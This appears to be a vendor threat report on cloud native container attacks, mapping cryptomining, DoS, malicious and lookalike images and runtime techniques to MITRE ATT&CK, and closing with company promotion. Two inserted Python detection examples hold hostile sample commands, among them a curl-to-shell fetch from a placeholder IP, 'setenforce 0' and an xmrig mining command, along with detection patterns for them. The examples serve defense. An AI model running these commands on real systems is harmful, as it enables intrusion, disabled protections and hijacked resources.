In the past few years, reports of attacks on cloud native environments have become more and more frequent. Drawing on our experience supporting cloud native security projects for many large customers, together with research on and analysis of various public reports, we have gained some understanding of attackers' tactics, TTPs, activity cycles and attack complexity. This article summarizes those findings in the hope of contributing to the cloud native security ecosystem.
At present, in cloud native scenarios, the main motivations of attackers are hijacking resources for cryptomining and launching DoS attacks.
Take the cryptomining scenario as an example. In this kind of attack the attacker mainly uses the xmrig binary, and the images involved openly state that they are designed for mining. On the other hand, if a cryptomining process is hidden inside an image that someone pulls and runs, the component is more properly treated as a potentially unwanted application (PUA). Because this kind of attack degrades performance, the MITRE ATT&CK framework classifies it as Resource Hijacking.
Take the DoS attack scenario as an example. Slowloris is a denial-of-service (DoS) attack against HTTP servers carried out with special-purpose software (such as slowhttptest). During the attack, the attacking machine sends incomplete HTTP requests, causing the victim host to hold many connections open while it waits for the rest of each request. As a result, the server reaches its limit on concurrent open connections and cannot accept new connections to serve legitimate HTTP requests.

Figure 1: Denial of Service Attack Scheme
Since the beginning of 2020, the number of container-based attacks has increased dramatically, and attackers have begun to adopt increasingly advanced evasion techniques that bypass conventional security controls such as static malware scanning. In addition, attackers increasingly use techniques such as defense evasion, hiding their command and control infrastructure behind web services, to conceal their attacks and achieve persistence.
In order to better analyze how attacks in cloud native scenarios have evolved, we first classify cloud native attacks and then analyze them against the ATT&CK framework.
Summary and classification of cloud native attacks
The behavior of an experienced attacker may include multiple attack actions. We classify attack behavior along two dimensions: the first is the complexity of the attack, and the second is the scope of its impact.
Classification by complexity
Some attackers use dedicated malicious images whose names plainly state their purpose, such as XMRIG or UDPFLOOD. In most cases this technique is not difficult: the attacker pulls an image built by a third party from Docker Hub and runs it with the relevant configuration.
Some attackers use legitimate-looking but deceptive image names, such as Ubuntu1. In addition, the image author may use various techniques to evade detection, such as disabling security tools or obfuscating files. In most cases the complexity of this technique is moderate: the attacker builds the image, pushes it to Docker Hub, and gives it a misleading name such as Nginx.
Finally, attackers also take advantage of trusted base images. This is the most sophisticated technique. Attackers use the latest version of an official general-purpose image (for example 'alpine:latest'). Using an official and seemingly harmless image increases the chance of passing the scans of most security tools, because users generally assume that such images contain no vulnerabilities or malicious components. Some organizations only allow images on a whitelist, and using official images increases the likelihood that the attack proceeds as planned, because in most cases these images are pre-approved for use.

Table 1: Complexity Analysis of Cloud Native Attacks
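As an added example (not code from the report or from its vendor), the following Python sorts image references into the three complexity tiers above and shows where an image whitelist stops helping: it can block the first two tiers by name, but for the third tier it can only vouch for a pinned digest, not for what the image does at runtime. The known-malicious names, the official-image list and the approved digest are constructed assumptions.

```python
"""Classify container image references into the three complexity tiers the
report describes and show where an image whitelist alone stops helping.
Added example; the name lists and approved digest below are constructed."""
import difflib
from typing import Dict, Optional, Tuple

# Constructed: names the report cites as openly malicious, a few official
# Docker Hub library images that get imitated, and one placeholder digest
# standing in for an organisation's pre-approved image.
KNOWN_MALICIOUS = {"xmrig", "udpflood"}
OFFICIAL_LIBRARY = {"alpine", "ubuntu", "nginx", "busybox", "redis"}
APPROVED_DIGESTS = {"sha256:" + "a" * 64}

def parse_image_ref(ref: str) -> Dict[str, Optional[str]]:
    """Split 'registry/namespace/repo:tag@digest' applying Docker's defaults
    (docker.io registry, 'library' namespace, 'latest' tag)."""
    digest = None
    if "@" in ref:
        ref, digest = ref.split("@", 1)
    parts = ref.split("/")
    registry = "docker.io"
    # A first component with a dot, a port or 'localhost' is a registry host.
    if len(parts) > 1 and ("." in parts[0] or ":" in parts[0] or parts[0] == "localhost"):
        registry = parts.pop(0)
    repo, _, tag = parts[-1].partition(":")
    namespace = "/".join(parts[:-1]) or ("library" if registry == "docker.io" else "")
    return {"registry": registry, "namespace": namespace, "repo": repo.lower(),
            "tag": tag or "latest", "digest": digest}

def classify(ref: str) -> Tuple[str, str]:
    """Return (complexity tier, verdict) for one image reference."""
    img = parse_image_ref(ref)
    repo = img["repo"]
    if repo in KNOWN_MALICIOUS:          # tier 1: the name advertises the tool
        return "low", "block: name advertises a known mining or flood tool"
    is_official = img["registry"] == "docker.io" and img["namespace"] == "library"
    if not (is_official and repo in OFFICIAL_LIBRARY):
        # tier 2: 'ubuntu1' or 'someuser/nginx' resembles an official image
        stem = repo.rstrip("0123456789")
        close = difflib.get_close_matches(stem, sorted(OFFICIAL_LIBRARY), n=1, cutoff=0.8)
        if close:
            return "medium", "block: lookalike of official image %r" % close[0]
        return "unknown", "block: not an approved image"
    # tier 3: a genuine official image; the whitelist can only vouch for a pinned
    # digest, and even then runtime behaviour (downloaded scripts) must be watched
    if img["digest"] in APPROVED_DIGESTS:
        return "high", "allow: approved digest, monitor runtime behaviour"
    return "high", "review: official image with mutable tag %r" % img["tag"]
```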
Classification by scope of impact
In addition to classifying attacks by complexity, we also sorted out the range of targets affected by each attack. Based on this analysis, we identified two main types: network denial-of-service attacks and resource hijacking (mainly for cryptomining).

Table 2: Impact Scope Analysis of Cloud Native Attacks
Cloud Native Analysis Based on ATT&CK
Based on the summary above, we have a basic understanding of the complexity and scope of cloud native attacks. We now place the related attacks into the ATT&CK framework so that we can gain a deeper understanding of the TTPs, attack cycle and other characteristics of cloud native attacks. Below, we analyze the attacks of the past 12 months against the ATT&CK framework. Because attackers usually achieve the "initial access" tactic by exploiting vulnerabilities in applications exposed to the Internet, we do not discuss that tactic in detail.

Table 3: Cloud Native Attack Diagram Based on ATT&CK Framework
The most commonly used tactics: defense evasion, command and control, and discovery.
As shown in the figure below, among all the attacks we found, the tactics most commonly used by attackers are defense evasion, command and control, and discovery, which reflects the persistence and sophistication of the attacks.

Figure 2: The most commonly used tactics are defense evasion, command and control, and discovery.
Usually, the most common goal of attackers is to hijack resources, more specifically to mine cryptocurrency. In order to make better use of the host and evade detection, attackers take the characteristics of the host into account, so it is not surprising that "discovery" is one of the most commonly used tactics. In addition, some attacks are very stealthy, and each image uses several "defense evasion" techniques, such as disabling security tools and anti-debugging.
In some attacks the attacker uses a harmless image. But once it runs, the container is used to download malicious components from outside, including communicating with the attacker's C2 server. The third most commonly used category is therefore the "command and control" tactic.

Figure 3: Classification of attacker goals in image-based attacks
As can be seen from the figure above, 95% of images are used to hijack resources (mining) and 5% are used to launch network denial-of-service attacks. This means that although various images are used to attack cloud native environments, most attacks aim at mining. We speculate that denial-of-service (DoS) attacks are not very common because they usually occur in other attack scenarios, where attackers can easily find DoS services or powerful tools to launch large-scale attacks.
An example of cloud native attack analysis based on ATT&CK
For cloud native attacks, we use the MITRE ATT&CK framework as the basis of our analysis. Most TTPs used by attackers fall under sub-categories of the 12 tactic categories in the ATT&CK framework. Using these sub-categories, we describe each one and give some examples. In addition, MITRE ATT&CK also provides methods for detecting threats and reducing risk.
Below, we analyze the specific tactics and techniques attackers use against cloud native environments.
● Execution - Scripting
The alpine:latest image used in the attack downloads several scripts at runtime. With this technique, attackers bypass security tools that do not perform dynamic analysis of images. In this example, the script used by the attacker was written by someone else and may have been traded on the dark web. The script downloads the payload and sends a ping to a web service, which lets the attacker check the IP address of the target host.

Figure 4: Running a legitimate 'alpine:latest' image with a malicious shell script.
● Persistence - Local job scheduling
In some attacks, attackers use local job scheduling to run commands or scripts. These commands run in the background at regular intervals without user interaction, which increases the persistence of the attack.

Figure 5: Using cron jobs to increase the persistence of attacks
● Defense evasion - Disable security tools
alpine:latest downloads several scripts at runtime, and some of their functions detect and disable security tools such as SELinux and AppArmor.

Figure 6: Attackers are disabling security tools.
● Discovery - Network service scanning
An attacker may try to obtain a list of services running on remote hosts, including those that are easy to exploit remotely. Methods of obtaining this information include port and vulnerability scanning with tools the attacker brings onto the victim system. We found attackers using masscan and zgrab at runtime.

Figure 7: Scanning external and internal networks with network scanning tools.
● Command and control - Web services
Attackers used a variety of covert communication techniques to communicate with compromised hosts, as shown in the table below:

Table 4: Covert communication techniques attackers use to communicate with compromised hosts.
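The techniques walked through above (scripts fetched at runtime, cron persistence, disabling SELinux/AppArmor, masscan/zgrab scanning, mining) can be detected at runtime rather than only by image scanning. The Python below is an added example, not code from the report or its vendor: it maps constructed container exec events onto those ATT&CK tactics and flags a container once several tactics appear together, since the report observes that real attacks chain them. The command-line patterns are assumptions about what such tooling leaves in process telemetry.

```python
"""Map container process-execution events onto the ATT&CK tactics this report lists
for cloud native attacks, and flag containers that chain several of them.
Added example; the sample events are constructed, not captured from an incident."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# One rule per technique the report walks through: (tactic, technique, pattern).
RULES = [
    ("Execution", "Scripting", re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")),
    ("Persistence", "Local job scheduling", re.compile(r"\bcrontab\b|/etc/cron\.d/|/var/spool/cron/")),
    ("Defense Evasion", "Disable security tools",
     re.compile(r"\bsetenforce\s+0\b|\baa-(teardown|disable)\b|apparmor_parser\s+-R")),
    ("Discovery", "Network service scanning", re.compile(r"\b(masscan|zgrab)\b")),
    ("Impact", "Resource hijacking", re.compile(r"\bxmrig\b|stratum\+tcp://")),
]

# Constructed sample events in the shape a runtime sensor might emit; c1 mirrors
# the alpine:latest case from the report, c2 and c3 are ordinary workloads.
SAMPLE_EVENTS = [
    {"container": "c1", "cmdline": "sh -c 'curl -s http://203.0.113.10/init.sh | sh'"},
    {"container": "c1", "cmdline": "setenforce 0"},
    {"container": "c1", "cmdline": "crontab /tmp/.cr"},
    {"container": "c1", "cmdline": "masscan 10.0.0.0/8 -p80"},
    {"container": "c1", "cmdline": "/tmp/.x/xmrig -o stratum+tcp://pool.invalid:3333"},
    {"container": "c2", "cmdline": "nginx -g 'daemon off;'"},
    {"container": "c3", "cmdline": "crontab -l"},
]

def match_event(cmdline: str) -> List[Tuple[str, str]]:
    """Return the (tactic, technique) pairs whose pattern matches one command line."""
    return [(tactic, tech) for tactic, tech, rx in RULES if rx.search(cmdline)]

def analyse(events, min_tactics: int = 2) -> Dict[str, dict]:
    """Aggregate hits per container. One hit (such as a cron edit) is weak evidence,
    so a container is flagged only when it shows at least `min_tactics` tactics."""
    hits = defaultdict(list)
    for ev in events:
        hits[ev["container"]].extend(match_event(ev["cmdline"]))
    report = {}
    for cid, found in hits.items():
        if not found:
            continue                     # benign containers stay out of the report
        tactics = sorted({tactic for tactic, _ in found})
        report[cid] = {"tactics": tactics, "techniques": sorted(set(found)),
                       "flagged": len(tactics) >= min_tactics}
    return report

if __name__ == "__main__":
    print(analyse(SAMPLE_EVENTS))
```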
Conclusion
Facing the complex cloud native environment, understanding cloud native attack types and analyzing attack paths helps find more effective intrusion detection methods and improve security protection capability. In the cloud native field, Qingteng is a leader in cloud native security services.
Qingteng, home to the first cloud native security laboratory in China, began developing container security technology in 2018. After three years of careful refinement and 2.3 million lines of self-developed code, it has formed a native, secure, advanced and complete product solution. The Qingteng Honeycomb cloud native security platform is deployed in a fully cloud native manner, providing security capabilities that cover the whole life cycle of build, distribution and runtime, and helping enterprises complete their DevSecOps security practices.
At present, Qingteng Honeycomb has been adopted by more than 100 leading customers, and its excellent technology and performance have been highly recognized by many authoritative experts and institutions in the industry.
Qingteng is the first security enterprise in China to pass the highest-level Trusted Cloud Container Security Solution certification of the China Academy of Information and Communications Technology (CAICT), and the only security enterprise selected as a "2021 Cloud Native Technology Innovative Product"; it has obtained 14 patents and software copyrights related to cloud native security.
Qingteng is an important member of the Cloud Native Computing Foundation (CNCF), the Linux Foundation, the Cloud Native Industry Alliance, the Yangtze River Delta Cloud Native Industry Alliance and other organizations, and works with all parties to actively promote the rapid development of cloud native security. In addition, Qingteng actively participates in the cloud native security work organized by the Ministry of Industry and Information Technology, the Ministry of Public Security and other regulators, was deeply involved in preparing the industry's first White Paper on Cloud Native Architecture Security (2021), and participated in drafting public security industry standards such as Information Security Technology: Security Technical Requirements for Container Security Monitoring Products and the Cloud Native Maturity Model (CNMM) standard system.